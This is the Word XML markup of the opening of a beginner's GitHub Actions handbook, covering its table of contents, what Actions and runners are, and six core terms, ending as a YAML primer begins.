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jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">THE GITHUB ACTIONS HANDBOOK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">A book-length walk through GitHub Actions, written the way I wish someone had explained it to me the first time. Everything a beginner needs — concepts, syntax, recipes, real-world patterns, debugging, security, billing — but in plain language, one idea at a time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">If you just want a taste, read sections 1 to 4 and you'll be writing workflows by lunch. The rest of the document is here when you need it.</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Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">What GitHub Actions actually is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The six words that matter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">A quick YAML primer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Your first workflow (and what you'll see after)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Reading a real workflow file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Triggers — when things run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Jobs and steps — the shape of everything</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Using other people's actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Secrets and environment variables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Permissions, contexts, and the built-in variables you'll actually use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Recipes you'll probably copy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Real-world pipeline patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">When you start repeating yourself</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Debugging, and running workflows on your laptop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Security scanning — the stuff you shouldn't skip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Billing, minutes, and how not to burn through them</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">From push to production — the end-to-end flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Actions vs Azure DevOps Pipelines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Abbreviations, defined</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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 What GitHub Actions actually is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's the honest one-sentence version: GitHub Actions is a way to run scripts when stuff happens in your repo. That's it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Someone pushes code, you can run a script. Someone opens a pull request, you can run a script. It's 3 AM on a Tuesday, you can run a script. All the vocabulary — workflows, jobs, steps, runners — is just names for the pieces of the system that does exactly this one thing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The point of the tool is to do the boring reliable work so humans can do the interesting unreliable work. Run your tests automatically. Deploy when a tag is cut. Label new issues. Clean up stale branches. Anything you'd otherwise ask someone to remember to do, a workflow can do for you, every single time, without complaint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works under the hood</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="180"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="781050"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="lifecycle.png" descr="lifecycle.png" title="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781050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">When a triggering event fires in your repository, GitHub looks in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/workflows/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> for YAML files that care about that event. For any that do, GitHub spins up a brand new virtual machine (called a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">runner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">), clones your code onto it, runs the steps you listed, and then throws the machine away.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Yes — GitHub really spins up a fresh VM each time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Not a container, not a reused machine. A real Ubuntu / macOS / Windows VM that boots, runs your job, and gets destroyed. It comes pre-loaded with the tools most workflows need: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, Docker, Node, Python, Java, the GitHub CLI, kubectl, and dozens more. If your job needs something that isn't there, you install it as a step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Fresh machine every time is why CI is reliable. There's no leftover state from yesterday's broken run, no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">node_modules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a different branch, no half-installed dependencies. Every run starts from zero.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What people use it for</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Four big buckets, roughly:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — testing, linting, type-checking, building. Every push, every PR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — deploying code to dev, staging, or production when certain events happen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chores</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — labeling issues, closing stale PRs, generating changelogs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Scheduled tasks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — nightly cleanups, weekly reports, monthly cache resets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">If you can express the work as a script, you can automate it here.</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2. The six words that matter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Almost every conversation about GitHub Actions uses the same handful of words. Learn these and you'll follow 90% of any workflow file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Workflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. A YAML file in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/workflows/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. Defines one piece of automation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. Something that triggers a workflow — push, pull request, schedule, manual click, etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Job</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. A group of steps that run on the same runner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. A single task — either a shell command or a pre-packaged "action."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. A reusable unit of code, like a function you can call from a step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Runner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. The virtual machine (Ubuntu, macOS, or Windows) your job runs on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The mental model is nested: a workflow contains jobs, jobs contain steps, steps run commands or call actions. Hold that picture in your head and the rest is just details.</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3. A quick YAML primer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Every workflow file is YAML. It's not a hard format, but it has a few rules that, if you break them, will make your workflow mysteriously stop working. Get these right and you'll save yourself a lot of confusion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Indentation is structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
